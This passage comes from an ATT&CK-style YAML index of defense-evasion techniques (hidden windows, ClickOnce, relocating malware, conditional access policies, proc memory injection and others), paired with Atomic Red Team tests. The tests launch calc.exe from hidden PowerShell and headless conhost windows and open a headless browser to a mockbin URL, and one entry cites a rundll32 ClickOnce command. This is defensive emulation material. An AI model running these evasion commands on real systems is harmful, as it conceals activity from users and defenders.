invisible to other desktops windows.\n\nAdversaries may also leverage cmd.exe(Citation:
Cybereason - Hidden Malicious Remote Access) as a parent process, and then
utilize a LOLBin, such as DeviceCredentialDeployment.exe,(Citation: LOLBAS
Project GitHub Device Cred Dep)(Citation: SecureList BlueNoroff Device Cred
Dev) to hide windows."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Mark Tsipershtein
- Vijay Lalwani
- Liran Ravich, CardinalOps
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.4'
identifier: T1564.003
atomic_tests:
- name: Hidden Window
auto_generated_guid: f151ee37-9e2b-47e6-80e4-550b9f999b7a
description: |
Launch PowerShell with the "-WindowStyle Hidden" argument to conceal PowerShell windows by setting the WindowStyle parameter to hidden.
Upon execution a hidden PowerShell window will launch calc.exe
supported_platforms:
- windows
input_arguments:
powershell_command:
description: Command to launch calc.exe from a hidden PowerShell Window
type: string
default: powershell.exe -WindowStyle hidden calc.exe
executor:
command: 'Start-Process #{powershell_command}
'
name: powershell
- name: Headless Browser Accessing Mockbin
auto_generated_guid: 0ad9ab92-c48c-4f08-9b20-9633277c4646
description: |
The following Atomic Red Team test leverages the Chrome headless browser to access a mockbin site. Create your own Mockbin.org site and replace the BIN in the inputs.
The default Mockbin ID forwards to google.com and you may view the details here https://mockbin.org/bin/f6b9a876-a826-4ac0-83b8-639d6ad516ec/view.
Reference: https://cert.gov.ua/article/5702579
supported_platforms:
- windows
input_arguments:
bin_id:
description: Mockbin.org BIN ID
type: string
default: f6b9a876-a826-4ac0-83b8-639d6ad516ec
browser:
description: Browser to use (msedge, chrome, firefox)
type: string
default: chrome
executor:
command: 'start "" #{browser} --headless --disable-gpu https://mockbin.org/bin/#{bin_id}
'
cleanup_command: 'taskkill /im #{browser} /f
'
name: command_prompt
- name: Hidden Window-Conhost Execution
auto_generated_guid: 5510d22f-2595-4911-8456-4d630c978616
description: "Launch conhost.exe in \"headless\" mode, it means that no visible
window will pop up on the victim's machine. \nThis could be a sign of \"conhost\"
usage as a LOLBIN or potential process injection activity.\nconhost.exe can
be used as proxy the execution of arbitrary commands\n"
supported_platforms:
- windows
executor:
command: 'conhost.exe --headless calc.exe
'
cleanup_command: 'Stop-Process -Name calc*
'
name: powershell
elevation_required: true
T1127.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
created: '2024-09-09T14:39:28.637Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1127/002
external_id: T1127.002
- source_name: LOLBAS /Dfsvc.exe
description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
- source_name: Microsoft Learn ClickOnce
description: Microsoft. (2023, September 14). ClickOnce security and deployment.
Retrieved September 9, 2024.
url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
- source_name: SpectorOps Medium ClickOnce
description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
(Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
- source_name: NetSPI ClickOnce
description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
Love Story. Retrieved September 9, 2024.
url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
- source_name: Burke/CISA ClickOnce Paper
description: William J. Burke IV. (n.d.). Appref-ms Abuse for Code Execution
& C2. Retrieved September 9, 2024.
url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
- source_name: Burke/CISA ClickOnce BlackHat
description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
IN: When .appref-ms abuse is operating as intended. Retrieved September
9, 2024.'
url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:59:08.154Z'
name: ClickOnce
description: |-
Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Wirapong Petshagun
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
atomic_tests: []
T1070.010:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
created: '2024-05-31T11:07:57.406Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1070/010
external_id: T1070.010
- source_name: Latrodectus APR 2024
description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
(2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
31, 2024.'
url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
- source_name: DFIR Report Trickbot June 2023
description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
Retrieved May 31, 2024.
url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-05T16:08:40.119Z'
name: Relocate Malware
description: |-
Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Resource Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders. Moving payloads into target directories does not alter the Creation timestamp, thereby evading detection logic reliant on modifications to this artifact (i.e., [Timestomp](https://attack.mitre.org/techniques/T1070/006)).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Matt Anderson, @nosecurething, Huntress
- Gregory Frey
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network Devices
x_mitre_version: '1.2'
atomic_tests: []
T1556.009:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--ceaeb6d8-95ee-4da2-9d42-dc6aa6ca43ae
created: '2024-01-02T13:43:37.389Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1556/009
external_id: T1556.009
- source_name: AWS IAM Conditions
description: 'AWS. (n.d.). IAM JSON policy elements: Condition. Retrieved
January 2, 2024.'
url: https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_elements_condition.html
- source_name: GCP IAM Conditions
description: Google Cloud. (n.d.). Overview of IAM Conditions. Retrieved January
2, 2024.
url: https://cloud.google.com/iam/docs/conditions-overview
- source_name: JumpCloud Conditional Access Policies
description: 'JumpCloud. (n.d.). Get Started: Conditional Access Policies.
Retrieved January 2, 2024.'
url: https://jumpcloud.com/support/get-started-conditional-access-policies
- source_name: Microsoft Conditional Access
description: Microsoft. (2023, November 15). What is Conditional Access?.
Retrieved January 2, 2024.
url: https://learn.microsoft.com/en-us/entra/identity/conditional-access/overview
- source_name: Okta Conditional Access Policies
description: Okta. (2023, November 30). Conditional Access Based on Device
Security Posture. Retrieved January 2, 2024.
url: https://support.okta.com/help/s/article/Conditional-access-based-on-device-security-posture?language=en_US
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T22:09:03.621Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
Access Policies) In some cases, identity providers may also support the use
of risk-based metrics to deny sign-ins based on a variety of indicators. In
AWS and GCP, IAM policies can contain `condition` attributes that verify arbitrary
constraints such as the source IP, the date the request was made, and the
nature of the resources or regions being requested.(Citation: AWS IAM Conditions)(Citation:
GCP IAM Conditions) These measures help to prevent compromised credentials
from resulting in unauthorized access to data or resources, as well as limit
user permissions to only those required. \n\nBy modifying conditional access
policies, such as adding additional trusted IP ranges, removing [Multi-Factor
Authentication](https://attack.mitre.org/techniques/T1556/006) requirements,
or allowing additional [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535),
adversaries may be able to ensure persistent access to accounts and circumvent
defensive measures."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Gavin Knapp
- Joshua Penny
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- Identity Provider
x_mitre_version: '1.1'
atomic_tests: []
T1578.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
created: '2020-05-14T14:45:15.978Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1578/002
external_id: T1578.002
- source_name: AWS CloudTrail Search
description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
Retrieved June 17, 2020.
url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- source_name: Cloud Audit Logs
description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
url: https://cloud.google.com/logging/docs/audit#admin-activity
- source_name: Mandiant M-Trends 2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved November
17, 2024.
url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
- source_name: Azure Activity Logs
description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
2020.
url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:24.804Z'
name: Create Cloud Instance
description: |-
An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
Creating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
x_mitre_version: '1.2'
atomic_tests: []
T1055.009:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591
created: '2020-01-14T01:34:10.588Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1055/009
external_id: T1055.009
- source_name: Uninformed Needle
description: skape. (2003, January 19). Linux x86 run-time process manipulation.
Retrieved December 20, 2017.
url: http://hick.org/code/skape/papers/needle.txt
- source_name: GDS Linux Injection
description: McNamara, R. (2017, September 5). Linux Based Inter-Process Code
Injection Without Ptrace(2). Retrieved February 21, 2020.
url: https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html
- source_name: DD Man
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
url: http://man7.org/linux/man-pages/man1/dd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:25.806Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
privileges. Proc memory injection is a method of executing arbitrary code
in the address space of a separate live process. \n\nProc memory injection
involves enumerating the memory of a process via the /proc filesystem (/proc/[pid])
then crafting a return-oriented programming (ROP) payload with available gadgets/instructions.
Each running process has its own directory, which includes memory mappings.
Proc memory injection is commonly performed by overwriting the target processes’
stack using memory mappings provided by the /proc filesystem. This information
can be used to enumerate offsets (including the stack) and gadgets (or instructions
within the program that can be used to build a malicious payload) otherwise
hidden by process memory protections such as address space layout randomization
(ASLR). Once enumerated, the target processes’ memory map within /proc/[pid]/maps
can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux
Injection)(Citation: DD Man) \n\nOther techniques such as [Dynamic Linker
Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate
a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012),
proc memory injection may target child processes (such as a backgrounded copy
of sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context
of another process may allow access to the process's memory, system/network
resources, and possibly elevated privileges. Execution via proc memory injection
may also evade detection from security products since the execution is masked
under a legitimate process. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
x_mitre_version: '1.1'
atomic_tests: []
T1601.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f
created: '2020-10-19T19:49:24.129Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1601/001
external_id: T1601.001
- source_name: Killing the myth of Cisco IOS rootkits
description: Sebastian 'topo' Muñiz. (2008, May). Killing the myth of Cisco
IOS rootkits. Retrieved October 20, 2020.
url: https://drwho.virtadpt.net/images/killing_the_myth_of_cisco_ios_rootkits.pdf
- source_name: Killing IOS diversity myth
description: 'Ang Cui, Jatin Kataria, Salvatore J. Stolfo. (2011, August).
Killing the myth of Cisco IOS diversity: recent advances in reliable shellcode
design. Retrieved October 20, 2020.'
url: https://www.usenix.org/legacy/event/woot/tech/final_files/Cui.pdf
- source_name: Cisco IOS Shellcode
description: 'George Nosenko. (2015). CISCO IOS SHELLCODE: ALL-IN-ONE. Retrieved
October 21, 2020.'
url: http://2015.zeronights.org/assets/files/05-Nosenko.pdf
- source_name: Cisco IOS Forensics Developments
description: Felix 'FX' Lindner. (2008, February). Developments in Cisco IOS
Forensics. Retrieved October 21, 2020.
url: https://www.recurity-labs.com/research/RecurityLabs_Developments_in_IOS_Forensics.pdf
- source_name: Juniper Netscreen of the Dead
description: Graeme Neilson . (2009, August). Juniper Netscreen of the Dead.
Retrieved October 20, 2020.
url: https://www.blackhat.com/presentations/bh-usa-09/NEILSON/BHUSA09-Neilson-NetscreenDead-SLIDES.pdf
- source_name: Cisco IOS Software Integrity Assurance - Image File Verification
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Image File Verification. Retrieved October 19, 2020.
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7
- source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:26.083Z'
name: Patch System Image
description: "Adversaries may modify the operating system of a network device
to introduce new capabilities or weaken existing defenses.(Citation: Killing
the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation:
Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation:
Juniper Netscreen of the Dead) Some network devices are built with a monolithic
architecture, where the entire operating system and most of the functionality
of the device is contained within a single file. Adversaries may change this
file in storage, to be loaded in a future boot, or in memory during runtime.\n\nTo
change the operating system in storage, the adversary will typically use the
standard procedures available to device operators. This may involve downloading
a new file via typical protocols used on network devices, such as TFTP, FTP,
SCP, or a console connection. The original file may be overwritten, or a
new file may be written alongside of it and the device reconfigured to boot
to the compromised image.\n\nTo change the operating system in memory, the
adversary typically can use one of two methods. In the first, the adversary
would make use of native debug commands in the original, unaltered running
operating system that allow them to directly modify the relevant memory addresses
containing the running operating system. This method typically requires administrative
level access to the device.\n\nIn the second method for changing the operating
system in memory, the adversary would make use of the boot loader. The boot
loader is the first piece of software that loads when the device starts that,
in turn, will launch the operating system. Adversaries may use malicious
code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004)
method, to directly manipulate running operating system code in memory. This
malicious code in the bootloader provides the capability of direct memory
manipulation to the adversary, allowing them to patch the live operating system
during runtime.\n\nBy modifying the instructions stored in the system image
file, adversaries may either weaken existing defenses or provision new capabilities
that the device did not have before. Examples of existing defenses that can
be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600),
authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004),
and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599).
\ Adding new capabilities for the adversary’s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001),
[Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port
Knocking](https://attack.mitre.org/techniques/T1205/001).\n\nAdversaries may
also compromise existing commands in the operating system to produce false
output to mislead defenders. When this method is used in conjunction with
[Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one
example of a compromised system command may include changing the output of
the command that shows the version of the currently running operating system.
\ By patching the operating system, the adversary can change this command
to instead display the original, higher revision number that they replaced
through the system downgrade. \n\nWhen the operating system is patched in
storage, this can be achieved in either the resident storage (typically a
form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005).
\n\nWhen the technique is performed on the running operating system in memory
and not on the stored copy, this technique will not survive across reboots.
\ However, live memory modification of the operating system can be combined
with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve
persistence. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Network Devices
x_mitre_version: '1.1'
atomic_tests: []
T1070.009:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--d2c4e5ea-dbdf-4113-805a-b1e2a337fb33
created: '2022-07-29T19:32:11.552Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1070/009
external_id: T1070.009
- source_name: Cylance Dust Storm
description: Gross, J. (2016, February 23). Operation Dust Storm. Retrieved
December 22, 2021.
url: https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf
- source_name: Talos - Cisco Attack 2022
description: Nick Biasini. (2022, August 10). Cisco Talos shares insights
related to recent cyber attack on Cisco. Retrieved March 9, 2023.
url: https://blog.talosintelligence.com/recent-cyber-attack/
- source_name: NCC Group Team9 June 2020
description: Pantazopoulos, N. (2020, June 2). In-depth analysis of the new
Team9 malware family. Retrieved December 1, 2020.
url: https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-16T20:37:21.515Z'
name: Clear Persistence
description: |-
Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
In some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Gavin Knapp
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- ESXi
- Linux
- Windows
- macOS
x_mitre_version: '1.2'
atomic_tests: []
T1036.010:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
created: '2024-08-05T21:39:16.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1036/010
external_id: T1036.010
- source_name: Elastic CUBA Ransomware 2022
description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
August 5, 2024.
url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
- source_name: Invictus IR Cloud Ransomware 2024
description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
August 5, 2024.
url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
- source_name: Huntress MOVEit 2023
description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
- source_name: Aquasec Kubernetes Attack 2023
description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
2023.
url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T22:48:14.966Z'
name: Masquerade Account Name
description: "Adversaries may match or approximate the names of legitimate accounts
to make newly created ones appear benign. This will typically occur during
[Create Account](https://attack.mitre.org/techniques/T1136), although accounts
may also be renamed at a later date. This may also coincide with [Account
Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
deletes an account before re-creating one with the same name.(Citation: Huntress
MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
such as those associated with legitimate software, data backups, or container
cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
2024) Sometimes adversaries may model account names off of those already existing
in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
\ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
which describes impersonating specific trusted individuals or organizations,
rather than user or service account names. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- SaaS
- IaaS
- Containers
- Office Suite
- Identity Provider
x_mitre_version: '1.0'
atomic_tests: []
T1556.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1556/001
external_id: T1556.001
- source_name: Dell Skeleton
description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
Retrieved April 8, 2019.
url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- source_name: TechNet Audit Policy
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
process on a domain controller with the intent of creating a backdoor used
to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)).
Skeleton key works through a patch on an enterprise domain controller authentication
process (LSASS) with credentials that adversaries may use to bypass the standard
authentication system. Once patched, an adversary can use the injected password
to successfully authenticate as any domain user account (until the the skeleton
key is erased from memory by a reboot of the domain controller). Authenticated
access may enable unfettered access to hosts and/or resources within single-factor
